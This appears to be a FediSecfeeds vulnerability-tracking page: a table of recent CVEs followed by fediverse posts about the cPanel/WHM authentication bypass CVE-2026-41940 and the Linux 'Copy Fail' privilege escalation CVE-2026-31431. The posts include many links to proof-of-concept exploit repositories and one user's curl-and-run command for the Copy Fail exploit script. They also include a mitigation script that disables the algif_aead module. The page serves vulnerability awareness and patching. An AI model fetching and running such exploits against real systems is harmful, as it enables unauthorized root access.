FediSecfeeds

CVE	CVSS	EPSS	Posts	Repos	Nuclei	Updated	Description
CVE-2026-41940	9.8	0.00%	13	3	template	2026-04-30T01:16:02.837000	cPanel and WHM versions after 11.40 contain an authentication bypass vulnerabili
CVE-2026-31431	7.8	0.01%	66	22		2026-04-30T01:16:01.730000	In the Linux kernel, the following vulnerability has been resolved: crypto: alg
CVE-2026-7424	8.1	0.00%	2	0		2026-04-29T23:16:20.367000	Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4
CVE-2026-7420	8.8	0.00%	2	0		2026-04-29T23:16:20.193000	A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-18053
CVE-2026-7419	8.8	0.00%	2	0		2026-04-29T23:16:20.020000	A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th
CVE-2026-7418	8.8	0.00%	2	0		2026-04-29T22:16:22.620000	A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th
CVE-2026-5201	7.5	0.09%	1	1		2026-04-29T22:16:21.667000	A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vuln
CVE-2026-34965	8.8	0.00%	2	0		2026-04-29T21:22:20.120000	Cockpit CMS contains an authenticated remote code execution vulnerability in the
CVE-2026-42515	0	0.05%	1	0		2026-04-29T21:14:23.977000	This vulnerability exists in e-Sushrut due to improper access control in resourc
CVE-2026-5166	9.6	0.00%	4	0		2026-04-29T21:13:30.563000	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') v
CVE-2026-30893	9.0	0.00%	2	0		2026-04-29T20:16:29.660000	Wazuh is a free and open source platform used for threat prevention, detection,
CVE-2026-7466	8.8	0.00%	2	0		2026-04-29T19:16:27.013000	AgentFlow contains an arbitrary code execution vulnerability that allows attacke
CVE-2026-0204	8.0	0.00%	2	0		2026-04-29T18:31:42	A vulnerability in the access control mechanism of SonicOS may allow certain man
CVE-2026-6849	8.8	0.00%	2	1		2026-04-29T18:31:41	Improper neutralization of special elements used in an OS command ('OS command i
CVE-2026-5712	8.0	0.00%	2	0		2026-04-29T18:16:05.180000	This vulnerability impacts all versions of IdentityIQ and allows an authenticate
CVE-2026-26015	0	0.00%	2	0		2026-04-29T18:16:03.817000	DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before v
CVE-2026-42167	8.1	0.24%	5	2		2026-04-29T16:16:25.303000	mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary
CVE-2026-7344	8.8	0.01%	1	0		2026-04-29T15:31:44	Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.
CVE-2026-5760	9.8	0.38%	2	1		2026-04-29T15:31:38	SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) wh
CVE-2026-7343	9.8	0.03%	1	0		2026-04-29T13:16:53.763000	Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allo
CVE-2026-41873	9.8	0.12%	2	0		2026-04-29T13:16:51.850000	UNSUPPORTED WHEN ASSIGNED Inconsistent Interpretation of HTTP Requests ('H
CVE-2026-42615	7.2	0.01%	2	0		2026-04-29T06:33:35	GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated
CVE-2026-23773	4.3	0.01%	1	0		2026-04-29T06:33:31	Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Si
CVE-2026-7321	9.6	0.04%	2	0		2026-04-29T06:16:08.357000	Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking co
CVE-2024-1708	8.4	81.62%	8	3		2026-04-28T21:44:53.770000	ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner
CVE-2026-38651	8.2	0.04%	1	0		2026-04-28T21:37:12	Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0.
CVE-2026-32202	4.3	7.19%	12	0		2026-04-28T21:37:03	Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-24222	8.6	0.04%	2	0		2026-04-28T21:36:23	NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initializati
CVE-2026-24204	6.5	0.04%	1	0		2026-04-28T21:36:23	NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Imprope
CVE-2026-7288	8.8	0.04%	1	0		2026-04-28T20:25:44.987000	A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability aff
CVE-2026-7248	9.8	0.06%	1	0		2026-04-28T20:25:44.987000	A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the functio
CVE-2026-7244	9.8	0.89%	1	0		2026-04-28T20:24:20.377000	A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The
CVE-2026-7240	9.8	0.89%	1	0		2026-04-28T20:24:20.377000	A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vul
CVE-2026-5944	8.2	0.09%	1	0		2026-04-28T20:23:20.703000	An improper access control vulnerability exists in the Cisco Intersight Device C
CVE-2025-67223	7.5	0.13%	1	1		2026-04-28T20:18:13.020000	The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk be
CVE-2026-40976	9.1	0.04%	3	0		2026-04-28T20:11:56.713000	In certain circumstances, Spring Boot's default web security is ineffective allo
CVE-2026-27785	8.8	0.01%	1	0		2026-04-28T20:11:56.713000	Specific firmware versions of Milesight AIOT camera firmware contain hard-coded
CVE-2026-24186	8.8	0.06%	2	0		2026-04-28T20:10:42.070000	NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause
CVE-2026-24178	9.8	0.14%	2	0		2026-04-28T20:10:42.070000	NVIDIA NVFlare Dashboard contains a vulnerability in the user management and aut
CVE-2026-24231	6.3	0.01%	1	0		2026-04-28T20:10:42.070000	NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF prote
CVE-2026-3893	9.4	0.06%	1	0		2026-04-28T20:10:23.367000	The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing a
CVE-2026-41386	9.1	0.03%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bo
CVE-2026-41395	7.5	0.02%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 si
CVE-2026-41404	8.8	0.07%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in
CVE-2026-41399	7.5	0.05%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket
CVE-2026-41912	7.6	0.03%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vu
CVE-2026-41405	7.5	0.14%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performi
CVE-2026-42426	8.8	0.03%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.4.8 contains an improper authorization vulnerability where
CVE-2026-42423	7.5	0.04%	1	0		2026-04-28T20:10:23.367000	OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that by
CVE-2026-40473	8.8	0.11%	1	1		2026-04-28T19:43:05.663000	The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter
CVE-2026-3854	8.8	0.35%	34	4		2026-04-28T19:37:39.507000	An improper neutralization of special elements vulnerability was identified in G
CVE-2026-25874	9.8	0.11%	6	0		2026-04-28T19:01:40.377000	LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the as
CVE-2026-41602	7.5	0.13%	1	0		2026-04-28T18:40:25.530000	Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport G
CVE-2026-7320	7.5	0.03%	1	0		2026-04-28T18:31:36	Information disclosure due to incorrect boundary conditions in the Audio/Video c
CVE-2026-42432	None	0.02%	1	0		2026-04-28T18:30:39	## Impact Node Pairing Reconnect Command Escalation Bypasses operator.admin Sco
CVE-2026-42431	None	0.03%	1	0		2026-04-28T18:30:21	## Impact OpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` pers
CVE-2026-42422	None	0.04%	1	0		2026-04-28T18:28:01	## Impact OpenClaw `device.token.rotate` mints tokens for unapproved roles, byp
CVE-2026-41914	None	0.03%	1	0		2026-04-28T18:26:36	## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths.
CVE-2026-41396	None	0.01%	1	0		2026-04-28T18:21:31	## Summary Workspace `.env` can override the bundled plugin trust root ## Curre
CVE-2026-41394	None	0.05%	1	0		2026-04-28T18:20:50	## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scop
CVE-2026-41387	9.7	0.02%	1	0		2026-04-28T18:18:46	## Summary Host exec env override sanitization did not fail closed for several
CVE-2026-41384	None	0.01%	1	0		2026-04-28T18:17:40	## Summary Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable In
CVE-2026-41383	None	0.04%	1	0		2026-04-28T18:17:19	## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbi
CVE-2026-41378	None	0.18%	1	0		2026-04-28T18:15:32	## Summary Paired node escalates to gateway RCE via unrestricted node.event agen
CVE-2026-27760	8.1	0.10%	1	0		2026-04-28T15:30:58	OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in
CVE-2026-7289	8.8	0.04%	1	0		2026-04-28T15:30:58	A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the func
CVE-2026-7279	7.8	0.01%	1	0		2026-04-28T12:31:36	AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowi
CVE-2026-3323	7.5	0.01%	1	0		2026-04-28T12:31:36	An unsecured configuration interface on affected devices allows unauthenticated
CVE-2026-35431	10.0	0.09%	1	0		2026-04-28T12:10:53.103000	Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management
CVE-2026-7243	9.8	0.89%	1	0		2026-04-28T09:34:20	A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affe
CVE-2026-32644	9.8	0.02%	2	0		2026-04-28T03:31:36	Specific firmware versions of Milesight AIOT cameras use SSL certificates with d
CVE-2026-7202	9.8	0.89%	2	0		2026-04-28T03:31:36	A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This aff
CVE-2026-7203	9.8	0.89%	2	0		2026-04-28T03:31:36	A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerab
CVE-2026-20766	8.8	0.04%	1	0		2026-04-28T03:31:36	An out-of-bounds memory access vulnerability exists in specific firmware version
CVE-2026-7204	9.8	0.89%	3	0		2026-04-28T03:31:36	A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This iss
CVE-2026-40972	7.5	0.05%	1	0		2026-04-28T00:31:47	An attacker on the same network as the remote application may be able to utilize
CVE-2026-31649	9.8	0.05%	1	0		2026-04-27T21:31:56	In the Linux kernel, the following vulnerability has been resolved: net: stmmac
CVE-2026-31656	7.8	0.01%	1	0		2026-04-27T21:30:51	In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt
CVE-2026-31669	9.8	0.07%	1	0		2026-04-27T21:30:51	In the Linux kernel, the following vulnerability has been resolved: mptcp: fix
CVE-2026-31650	7.8	0.01%	1	0		2026-04-27T21:30:50	In the Linux kernel, the following vulnerability has been resolved: mmc: vub300
CVE-2026-31662	7.5	0.05%	1	0		2026-04-27T20:17:55.973000	In the Linux kernel, the following vulnerability has been resolved: tipc: fix b
CVE-2026-31657	9.8	0.06%	1	0		2026-04-27T20:16:58.960000	In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-31652	7.8	0.01%	1	0		2026-04-27T20:16:12.663000	In the Linux kernel, the following vulnerability has been resolved: mm/damon/st
CVE-2026-31648	7.8	0.01%	1	0		2026-04-27T20:13:14.333000	In the Linux kernel, the following vulnerability has been resolved: mm: filemap
CVE-2026-31668	9.8	0.05%	1	0		2026-04-27T20:08:54.307000	In the Linux kernel, the following vulnerability has been resolved: seg6: separ
CVE-2026-40372	9.1	0.02%	2	0		2026-04-27T19:57:39.360000	Improper verification of cryptographic signature in ASP.NET Core allows an unaut
CVE-2026-33454	9.4	0.16%	1	0		2026-04-27T18:32:06	The Camel-Mail component is vulnerable to Camel message header injection. The cu
CVE-2026-31659	9.8	0.05%	1	0		2026-04-27T15:31:56	In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-31663	7.8	0.01%	1	0		2026-04-27T15:31:55	In the Linux kernel, the following vulnerability has been resolved: xfrm: hold
CVE-2026-3008	6.6	0.01%	1	3		2026-04-27T15:30:52	Successful exploitation of the string injection vulnerability could allow an att
CVE-2026-31637	9.8	0.05%	1	0		2026-04-27T15:30:46	In the Linux kernel, the following vulnerability has been resolved: rxrpc: reje
CVE-2026-40261	8.8	0.04%	1	2		2026-04-25T18:12:00.320000	Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 th
CVE-2026-6042	3.3	0.01%	1	1		2026-04-24T18:01:13.913000	A security flaw has been discovered in musl libc up to 1.2.6. Affected is the fu
CVE-2026-5450	9.8	0.05%	1	0		2026-04-23T18:32:57	Calling the scanf family of functions with a %mc (malloc'd character match) in t
CVE-2026-3844	9.8	0.08%	1	4		2026-04-23T04:00:28	The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads du
CVE-2026-35369	5.5	0.02%	1	0		2026-04-22T18:31:57	An argument parsing error in the kill utility of uutils coreutils incorrectly in
CVE-2026-5588	0	0.01%	1	0		2026-04-21T16:16:20.540000	Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the
CVE-2026-33626	7.5	0.04%	1	0		2026-04-21T15:04:13	## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeplo
CVE-2025-61260	9.8	0.10%	1	0		2026-04-17T15:24:57.753000	A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enabl
CVE-2026-20148	4.9	0.06%	1	0		2026-04-17T15:09:46.880000	A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2026-34197	8.8	65.07%	2	9	template	2026-04-16T19:59:38.107000	Improper Input Validation, Improper Control of Generation of Code ('Code Injecti
CVE-2026-20147	10.0	0.28%	1	0		2026-04-15T18:32:04	A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2025-29787	0	0.33%	1	0		2026-04-15T00:35:42.020000	`zip` is a zip library for rust which supports reading and writing of simple ZIP
CVE-2026-40200	8.2	0.02%	1	0		2026-04-10T18:31:28	An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory co
CVE-2025-8065	6.5	0.08%	2	0		2026-04-03T18:31:04	A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3.
CVE-2026-35414	4.2	0.02%	1	2		2026-04-02T18:31:50	OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon
CVE-2024-1709	10.0	94.32%	1	7	template	2026-03-21T05:29:22	ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Byp
CVE-2025-32432	10.0	87.87%	1	5	template	2026-03-20T19:14:20.843000	Craft is a flexible, user-friendly CMS for creating custom digital experiences o
CVE-2026-21510	8.8	3.35%	1	1		2026-02-11T16:13:25.603000	Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-24061	9.8	87.77%	1	69	template	2026-02-11T15:40:42.937000	telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "
CVE-2026-21509	7.8	10.86%	1	12		2026-02-10T15:30:22	Reliance on untrusted inputs in a security decision in Microsoft Office allows a
CVE-2025-12383	None	0.04%	1	0		2026-02-05T15:43:37	In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignori
CVE-2026-22704	8.1	0.02%	1	0		2026-01-13T15:09:35	### Summary Stored XSS Leading to Account Takeover ### Details The Exploit Chai
CVE-2025-68705	None	0.04%	1	1		2026-01-07T21:34:38	# RustFS Path Traversal Vulnerability ## Vulnerability Details - CVE ID:
CVE-2025-68161	None	0.03%	1	0		2025-12-19T22:08:03	The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does
CVE-2025-48924	6.5	0.04%	1	1		2025-11-05T20:30:33	Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects
CVE-2025-59250	8.1	0.08%	1	0		2025-10-30T16:35:42.213000	Improper input validation in JDBC Driver for SQL Server allows an unauthorized a
CVE-2025-59536	8.8	0.03%	1	4		2025-10-23T12:46:37.910000	Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable t
CVE-2024-21413	9.8	92.99%	1	35		2025-10-22T00:33:00	Microsoft Outlook Remote Code Execution Vulnerability
CVE-2019-1367	7.5	90.77%	2	1		2025-10-22T00:32:47	A remote code execution vulnerability exists in the way that the scripting engin
CVE-2022-24138	7.8	0.28%	1	0		2024-11-21T06:49:53.140000	IOBit Advanced System Care (Asc.exe) 15 and Action Download Center both download
CVE-2026-42208	0	0.00%	6	1			N/A
CVE-2026-7426	0	0.00%	2	0			N/A
CVE-2025-6020	0	0.07%	1	0			N/A
CVE-2026-25262	0	0.00%	2	0			N/A
CVE-2026-6429	0	0.00%	1	0			N/A
CVE-2026-5545	0	0.00%	1	0			N/A
CVE-2026-6253	0	0.00%	1	0			N/A
CVE-2026-7168	0	0.00%	1	0			N/A
CVE-2026-41649	0	0.03%	1	0			N/A
CVE-2025-54136	0	0.11%	1	1			N/A
CVE-2026-41651	0	0.20%	1	7			N/A
CVE-2026-35177	0	0.01%	1	0			N/A

CVE-2026-41940
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-04-30T01:16:02.837000

13 posts

cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.

Nuclei template

3 repos

https://github.com/Sachinart/CVE-2026-41940-cpanel-0day

https://github.com/debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker

https://github.com/adriyansyah-mf/cve-2026-41940-poc

offseq at 2026-04-30T01:30:29.611Z ##

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. https://radar.offseq.com/threat/cve-2026-41940-cwe-306-missing-authentication-for--3aceec8f #OffSeq #cPanel #Vulnerability #Infosec

##

campuscodi@mastodon.social at 2026-04-30T00:20:04.000Z ##

Major authentication bypass disclosed in cPanel

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026

##

thehackerwire@mastodon.social at 2026-04-29T23:42:10.000Z ##

🔴 CVE-2026-41940 - Critical (9.8)

cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized acc...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41940/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AlesandroOrtiz at 2026-04-29T22:32:03.430Z ##

@mttaggart Detailed analysis by Watchtowr: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

##

glitterbean@wehavecookies.social at 2026-04-29T19:24:20.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

##

threatcodex at 2026-04-29T18:11:35.993Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

##

_r_netsec at 2026-04-29T17:28:05.206Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

##

offseq@infosec.exchange at 2026-04-30T01:30:29.000Z ##

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. https://radar.offseq.com/threat/cve-2026-41940-cwe-306-missing-authentication-for--3aceec8f #OffSeq #cPanel #Vulnerability #Infosec

##

campuscodi@mastodon.social at 2026-04-30T00:20:04.000Z ##

Major authentication bypass disclosed in cPanel

https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026

##

thehackerwire@mastodon.social at 2026-04-29T23:42:10.000Z ##

🔴 CVE-2026-41940 - Critical (9.8)

cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized acc...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41940/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AlesandroOrtiz@infosec.exchange at 2026-04-29T22:32:03.000Z ##

@mttaggart Detailed analysis by Watchtowr: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

##

threatcodex@infosec.exchange at 2026-04-29T18:11:35.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

##

_r_netsec@infosec.exchange at 2026-04-29T17:28:05.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

##

CVE-2026-31431
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-30T01:16:01.730000

66 posts

In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just

22 repos

https://github.com/vishwanathakuthota/copy-fail-CVE-2026-31431

https://github.com/JnamerZ/CopyFail-CVE-2026-31431

https://github.com/Theori-lO/copy-fail-CVE-2026-31431

https://github.com/insomnisec/Detections-CVE-2026-31431

https://github.com/Alfredooe/CVE-2026-31431

https://github.com/Crihexe/copy-fail-tiny-elf-CVE-2026-31431

https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC

https://github.com/theori-io/copy-fail-CVE-2026-31431

https://github.com/painoob/Copy-Fail-Exploit-CVE-2026-31431

https://github.com/someCorp/copyFail-CVE-2026-31431-workaround-bash

https://github.com/ZephrFish/CopyFail-CVE-2026-31431

https://github.com/luotian2/CVE-2026-31431

https://github.com/b5null/CVE-2026-31431-C

https://github.com/mhdgning131/CVE-2026-31431_poc

https://github.com/rootsecdev/cve_2026_31431

https://github.com/gubaiovo/CVE-2026-31431

https://github.com/desultory/CVE-2026-31431

https://github.com/badsectorlabs/copyfail-go

https://github.com/yiyihuohuo/CVE-2026-31431

https://github.com/Sndav/CVE-2026-31431-Advanced-Exploit

https://github.com/ruattd/cve-2026-31431

https://github.com/tgies/copy-fail-c

tankgrrl@hachyderm.io at 2026-04-30T02:46:20.000Z ##

Joker voice: Just wait 'til malicious agents and oberly aggressive users get a load of CVE-2026-31431

##

tankgrrl@hachyderm.io at 2026-04-30T02:40:15.000Z ##

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

##

thesamesam@treehouse.systems at 2026-04-30T01:06:03.000Z ##

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

##

newsyc500@toot.community at 2026-04-30T00:43:14.000Z ##

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

##

hn500@social.lansky.name at 2026-04-30T00:35:11.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

adamw@fosstodon.org at 2026-04-29T23:39:24.000Z ##

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/refs/heads/main/copy_fail_exp.py
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

##

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

obivan at 2026-04-29T22:43:47.841Z ##

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 https://copy.fail/

##

roens@hachyderm.io at 2026-04-29T22:32:13.000Z ##

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

https://copy.fail/

##

marshray at 2026-04-29T22:21:07.283Z ##

This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb at 2026-04-29T22:15:16.659Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB https://secdb.nttzen.cloud/cve/detail/CVE-2026-31431

#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel

##

ajuvo@chaos.social at 2026-04-29T22:01:27.000Z ##

https://security-tracker.debian.org/tracker/CVE-2026-31431

##

cR0w at 2026-04-29T21:55:48.287Z ##

@krypt3ia @Viss https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

##

sambowne at 2026-04-29T21:46:01.476Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation https://copy.fail/

##

newsyc300@toot.community at 2026-04-29T21:43:29.000Z ##

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

##

hackernewsrobot@mastodon.social at 2026-04-29T21:37:14.000Z ##

Copy Fail – CVE-2026-31431 https://copy.fail/

##

geheimorga@chaos.social at 2026-04-29T21:23:23.000Z ##

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:19:51.000Z ##

https://security-tracker.debian.org/tracker/CVE-2026-31431

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:11:07.000Z ##

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

##

newsyc250@toot.community at 2026-04-29T21:03:31.000Z ##

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

##

hn250@social.lansky.name at 2026-04-29T21:00:11.000Z ##

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

##

interpipes@thx.gg at 2026-04-29T20:44:26.000Z ##

Hello

I am here to ruin your day again

https://copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

##

Emily at 2026-04-29T20:32:32.891Z ##

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

https://access.redhat.com/security/cve/cve-2026-31431

##

Emily at 2026-04-29T20:31:18.159Z ##

RE: https://hachyderm.io/@petrillic/116489574280084326

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: https://access.redhat.com/security/cve/cve-2026-31431

##

newsyc200@toot.community at 2026-04-29T20:23:26.000Z ##

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

##

DerMolly@kif.rocks at 2026-04-29T20:22:15.000Z ##

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

